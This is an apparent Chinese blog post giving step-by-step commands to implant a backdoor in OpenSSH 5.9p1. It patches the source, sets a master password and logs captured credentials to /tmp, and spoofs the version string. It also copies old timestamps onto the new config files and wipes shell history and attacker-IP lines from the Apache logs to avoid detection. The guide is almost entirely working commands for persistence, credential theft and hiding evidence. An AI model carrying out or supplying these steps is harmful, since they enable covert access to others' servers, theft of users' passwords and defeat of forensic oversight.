SSH后门复现

发表于 |

#SSH后门复现

最开始先查看自己的ssh版本

ssh -v

然后下载openssh和ssh后门

1
2
3
4
5
6
7
8
wget http://down1.chinaunix.net/distfiles/openssh-5.9p1.tar.gz
wget http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
tar zxvf openssh-5.9p1.tar.gz
tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
cd openssh-5.9p1.patch/
cp sshbd5.9p1.diff ../openssh-5.9p1
cd ../openssh-5.9p1
patch < sshbd5.9p1.diff   //patch  后门

这时有可能出现报错信息
-bash: patch: command not found
代表没有安装patch命令包,解决方案:

yum -y install patch

备份SSH原始配置文件

1
2
mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

修改后门密码,和记录文件的位置

vi includes.h

找到并修改

1
2
3
4
5
6
#define ILOG "/tmp/ilog"
//记录登录到本机的用户名和密码
#define OLOG "/tmp/olog"
//记录本机登录到远程的用户名和密码
#define SECRETPW "fdrag0n"
//你后门的密码

修改SSH版本信息,改为第一步看到的

vi version.h

环境配置

如果没有以上环境有可能会报错

1
2
3
yum install -y gcc
yum install -y openssl openssl-devel pam-devel
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

如果出现报错信息中带有:
configure: error: zlib.h missing – please install first or check config.log之类的信息
安装zib

yum install -y zlib

安装并重启SSH

1
2
make && make install
service sshd restart

简单处理记录

还原新配置文件为旧配置文件时间

1
2
touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config
touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config

将ssh_config和sshd_config修改时间跟ssh_config.old和sshd_config.old一致,减少被发现的概率。

清除apache日志

1
2
3
4
5
export HISTFILE=/dev/null 
export HISTSIZE=0 
cd /etc/httpd/logs/ 
sed -i ‘/192.168.52.175/d’ access_log* 
echo >/root/.bash_history //清空操作日志

清除用户目录下的.bash_history文件

vi .bash_history

然后全部删除保存。